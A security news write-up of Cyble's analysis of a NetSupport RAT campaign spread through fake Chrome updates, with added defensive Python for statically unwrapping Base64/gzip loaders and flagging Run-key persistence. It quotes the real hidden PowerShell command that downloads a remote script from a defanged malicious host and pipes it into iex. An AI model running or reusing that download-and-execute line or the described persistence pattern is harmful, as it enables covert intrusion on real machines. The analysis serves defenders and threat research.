Security researchers at Cyble Research and Intelligence Labs (CRIL) reported a NetSupport RAT campaign attributed to the operators of the SocGholish malware framework. The RAT was delivered to victims through a fake Google Chrome browser update.
In the campaign Cyble describes, the attackers used a drive-by download to steer users to a counterfeit Chrome update page. Once there, the visitor was prompted to download the "update", which was designed to look identical to a genuine Chrome browser update.
Cyble analyzes the NetSupport (RAT) campaign
Once the fake update was executed, the threat actor used the resulting foothold to deploy further tooling, including the Cobalt Strike framework and ransomware.
The downloaded ZIP archive used the following PowerShell command to fetch a second-stage PowerShell script and run it in memory through Invoke-Expression (iex):
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -c "iwr -usebasicparsing hxxp://aeoi[.]pl/15.ico |iex"
Here -w h (-WindowStyle Hidden) keeps the console window from appearing, -c runs the quoted command, and iwr (Invoke-WebRequest) downloads the script, disguised as an .ico file, and pipes its content straight into iex, so nothing is written to disk at this stage.
On further analysis, Cyble's researchers found that the second-stage script carried its next layer as a Base64 string (Base64 represents binary data as printable ASCII characters). The script decoded that string with [System.Convert]::FromBase64String and then decompressed the result with a gzip stream opened in [System.IO.Compression.CompressionMode]::Decompress mode.
The decoded script contained embedded payloads and the deployment logic for the NetSupport RAT client, "whost.exe". When run, it dropped those payloads to disk and created a Run registry entry for "whost.exe", so the RAT starts each time the user logs in.
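The Base64-then-gzip wrapper described above is a common loader pattern, and an analyst wants to unwrap it statically rather than let PowerShell run it. The following Python is an added example, not Cyble's or the malware's code: it builds a constructed stage-2 script that mimics the pattern in the report (FromBase64String, then CompressionMode.Decompress, then iex), and then peels the embedded layers off without executing anything. The inner script text, variable names and the nesting depth are illustrative assumptions; it also handles nested wrappers and a binary (MZ) inner payload, which goes beyond the single layer the report mentions.

```python
"""Static unwrapper for Base64 + gzip PowerShell loader layers (added example)."""
import base64
import gzip
import re

# Constructed stand-in for the real stage-3 content: a harmless command.
INNER_SCRIPT = "Write-Output 'stage 3 would drop whost.exe here'"


def build_constructed_stage2(inner: str) -> str:
    """Build a loader in the shape the report describes (constructed sample, not the real script)."""
    blob = base64.b64encode(gzip.compress(inner.encode(), mtime=0)).decode()
    return (
        '$b = [System.Convert]::FromBase64String("' + blob + '")\n'
        "$ms = New-Object System.IO.MemoryStream(,$b)\n"
        "$gz = New-Object System.IO.Compression.GZipStream($ms, "
        "[System.IO.Compression.CompressionMode]::Decompress)\n"
        "$sr = New-Object System.IO.StreamReader($gz)\n"
        "iex $sr.ReadToEnd()\n"
    )


SAMPLE_STAGE2 = build_constructed_stage2(INNER_SCRIPT)
NESTED_STAGE2 = build_constructed_stage2(SAMPLE_STAGE2)  # two wrappers deep

# FromBase64String('...') or FromBase64String("..."), capturing the literal.
_B64_CALL = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)", re.I)
# Execution sinks that turn decoded text into running code.
_EXEC_SINK = re.compile(r"\b(iex|Invoke-Expression)\b", re.I)
GZIP_MAGIC = b"\x1f\x8b"
PE_MAGIC = b"MZ"


def _decode_literal(literal: str) -> bytes:
    """Base64-decode a literal and gunzip it if it carries the gzip magic."""
    raw = base64.b64decode(re.sub(r"\s+", "", literal))
    if raw.startswith(GZIP_MAGIC):
        raw = gzip.decompress(raw)
    return raw


def decode_stage(script: str, max_depth: int = 5) -> dict:
    """Unwrap embedded Base64/gzip layers without executing anything.

    Returns the innermost decoded text (or raw bytes for a binary payload),
    how many layers were removed, and whether the outer script feeds its
    result to an execution sink.
    """
    executes = bool(_EXEC_SINK.search(script))
    current, layers = script, 0
    while layers < max_depth:
        match = _B64_CALL.search(current)
        if not match:
            break
        decoded = _decode_literal(match.group(1))
        layers += 1
        if decoded.startswith(PE_MAGIC):
            # A dropped executable: report it instead of trying to read it as text.
            return {"text": None, "binary": decoded, "layers": layers, "executes": executes}
        try:
            current = decoded.decode("utf-8")
        except UnicodeDecodeError:
            return {"text": None, "binary": decoded, "layers": layers, "executes": executes}
    return {"text": current, "binary": None, "layers": layers, "executes": executes}


if __name__ == "__main__":
    result = decode_stage(NESTED_STAGE2)
    print(f"layers removed: {result['layers']}, feeds iex: {result['executes']}")
    print(result["text"])
```

The decoder deliberately stops at a PE image rather than decoding it further; at that point the artifact should go to a sandbox or static PE tooling, not to another text pass. Real samples often add a layer of -EncodedCommand (UTF-16LE Base64) or string reversal on top of this; extend `_decode_literal` for those rather than running the script to find out.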
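The Run-key entry for "whost.exe" is the persistence artifact a responder would hunt for. The Python below is an added example, not Cyble's tooling: it parses a constructed dump in the text format of `reg query ... /s` output and flags autostart values that either name the binary from the report or launch from a user-writable directory. The user name, paths and value names in the dump are made up; the small allowlist stands in for an organisation's own baseline and is an assumption.

```python
"""Triage of Run-key persistence entries (added example, constructed data)."""
import re
from typing import NamedTuple

# Constructed dump in the shape of `reg query <key> /s` output; only whost.exe comes from the report.
RUN_KEY_DUMP = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    whost    REG_SZ    "C:\Users\alice\AppData\Roaming\whost\whost.exe"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
"""


class RunEntry(NamedTuple):
    key: str
    name: str
    command: str
    exe: str


# Directories a standard user can write to; legitimate autostarts rarely live here
# except a few well-known installers, so treat a hit as a lead, not proof.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Users\\Public)\\", re.I)
KNOWN_BAD_NAMES = {"whost.exe"}          # executable name from the Cyble report
BASELINE_ALLOWLIST = {"onedrive.exe"}    # assumed org baseline, not a general rule


def extract_exe(command: str) -> str:
    """Return the executable path from a Run value: the quoted path, or the first token."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command
    return command.split()[0]


def parse_run_dump(dump: str) -> list:
    """Parse `reg query` style text into RunEntry records."""
    entries, current_key = [], None
    for line in dump.splitlines():
        if not line.strip():
            continue
        if not line.startswith(" "):       # key header line, no indentation
            current_key = line.strip()
            continue
        parts = re.split(r"\s{2,}|\t", line.strip(), maxsplit=2)
        if len(parts) != 3 or current_key is None:
            continue
        name, _reg_type, command = parts
        entries.append(RunEntry(current_key, name, command, extract_exe(command)))
    return entries


def is_suspicious(entry: RunEntry) -> bool:
    """Flag known-bad binary names and unbaselined autostarts from user-writable paths."""
    basename = entry.exe.rsplit("\\", 1)[-1].lower()
    if basename in KNOWN_BAD_NAMES:
        return True
    return bool(USER_WRITABLE.search(entry.exe)) and basename not in BASELINE_ALLOWLIST


def triage(dump: str) -> list:
    """Return the names of Run values worth a closer look."""
    return [e.name for e in parse_run_dump(dump) if is_suspicious(e)]


if __name__ == "__main__":
    for e in parse_run_dump(RUN_KEY_DUMP):
        print(("SUSPECT " if is_suspicious(e) else "ok      ") + f"{e.key} -> {e.name}: {e.exe}")
```

On a live host the same dump comes from `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /s` and its HKLM counterpart; the path heuristic is intentionally broad, since NetSupport clients get dropped under whatever directory the loader chooses, and the allowlist is where local knowledge goes.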
About NetSupport (RAT)
NetSupport Manager is a legitimate commercial remote administration tool, comparable to TeamViewer, AnyDesk, and Quick Assist, built to provide remote support to users. Copies are nonetheless readily available on underground hacking forums, which is why it is so often encountered as a RAT.
Cybercriminals have increasingly adopted NetSupport Manager as a primary tool for gaining remote access to victims' machines: the same client that provides legitimate support is repackaged and deployed in internet-based crime campaigns.
According to Cyble's post, the NetSupport RAT can perform a range of malicious actions on a victim's device, including launching applications remotely, locating valuable data on hard drives and network shares, and collecting system information.